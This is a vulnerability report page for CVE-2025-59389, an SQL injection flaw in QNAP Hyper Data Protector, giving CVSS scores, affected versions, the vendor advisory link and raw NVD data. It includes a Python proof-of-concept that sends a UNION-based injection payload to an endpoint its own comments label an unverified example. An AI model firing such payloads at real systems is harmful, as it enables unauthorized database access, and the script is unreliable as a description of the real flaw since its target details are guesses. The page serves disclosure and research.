Security Vulnerability Report
CVE-2025-59389 CVSS 9.8 CRITICAL

CVE-2025-59389

Published: 2026-01-02 16:17:00
Last Modified: 2026-01-22 18:20:58

Description

An SQL injection vulnerability has been reported to affect Hyper Data Protector. Remote attackers can exploit the vulnerability to execute unauthorized code or commands. We have already fixed the vulnerability in the following versions: Hyper Data Protector 2.2.4.1 and later.

CVSS Details

CVSS Score (v3.1, NVD primary assessment)
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
The vendor's secondary CVSS v4.0 assessment in the raw data below scores it 8.1 HIGH; the two differ in scale, not in the finding.

Configurations (Affected Products)

cpe:2.3:a:qnap:hyper_data_protector:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:qnap:hyper_data_protector:2.0.0.1115:beta:*:*:*:*:*:* - VULNERABLE
QNAP Hyper Data Protector from 2.1.0.0226 up to (excluding) 2.2.4.1, plus 2.0.0.1115 beta (per the CPE match data in the raw record below)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-59389 SQL Injection PoC for QNAP Hyper Data Protector
# Target: QNAP Hyper Data Protector < 2.2.4.1
#
# NOTE(review): the endpoint path and form field names below are labelled
# as examples by the original author; nothing on this page ties them to
# the vendor advisory (QSA-25-48), which remains the authoritative source
# for the affected range (2.1.0.0226 up to, excluding, 2.2.4.1) and the fix.


def exploit_sql_injection(target_url):
    """
    Send one UNION-based probe to a fixed example endpoint and report
    whether the response body looks like it reflected the probe.

    Args:
        target_url: Base URL of the instance. A trailing '/' is stripped
            before the example endpoint path is appended.

    Returns:
        True if the request returned HTTP 200 and the body contains the
        substring 'UNION' or (case-insensitively) 'version'; False on any
        other status code or on a requests exception. A 200 body without
        those substrings falls through to the final ``return False``.

    A True result is a weak indicator only: the check is a plain substring
    match, so a page that echoes its input or merely mentions "version"
    satisfies it too. Treat it as a lead to verify against the advisory,
    not as confirmation of a finding.
    """
    # SQL Injection payload to extract database version
    payload = "' UNION SELECT NULL,@@version,NULL,NULL,NULL--"
    # Target endpoint (adjust based on actual vulnerable endpoint)
    endpoint = "/api/v1/backup/query"  # Example endpoint
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    # Data field vulnerable to SQL injection (per the original author; unverified here)
    data = {
        'task_id': payload,
        'user_id': '1'
    }
    full_url = target_url.rstrip('/') + endpoint
    try:
        print(f"[*] Sending SQL injection payload to {full_url}")
        # Form-encoded POST; the 10 s timeout bounds both the connect and
        # each read, so a non-responsive host does not hang the script.
        response = requests.post(full_url, data=data, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent successfully")
            print(f"[+] Response length: {len(response.text)} bytes")
            # Parse response for injected data
            # Substring heuristic only -- see the docstring for its
            # false-positive modes.
            if 'UNION' in response.text or 'version' in response.text.lower():
                print("[+] Potential SQL injection detected!")
                return True
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
        return False
    except requests.exceptions.RequestException as e:
        # Connection, timeout and TLS failures raised by requests all land
        # here; they are reported and mapped to False rather than re-raised.
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    # Exactly one positional argument (the base URL) is expected; anything
    # less prints usage and exits non-zero.
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} https://192.168.1.100:8080")
        sys.exit(1)
    target = sys.argv[1]
    exploit_sql_injection(target)

References

https://www.qnap.com/en/security-advisory/qsa-25-48 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59389", "sourceIdentifier": "[email protected]", "published": "2026-01-02T16:17:00.433", "lastModified": "2026-01-22T18:20:57.957", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An SQL injection vulnerability has been reported to affect Hyper Data Protector. The remote attackers can then exploit the vulnerability to execute unauthorized code or commands.\n\nWe have already fixed the vulnerability in the following versions:\nHyper Data Protector 2.2.4.1 and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:hyper_data_protector:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.1.0.0226", "versionEndExcluding": "2.2.4.1", "matchCriteriaId": "C50EED47-2DDC-46DE-83FA-6F3977855DDB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:qnap:hyper_data_protector:2.0.0.1115:beta:*:*:*:*:*:*", "matchCriteriaId": "5201012D-5227-4698-AE04-E00EBD5C37CC"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-48", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}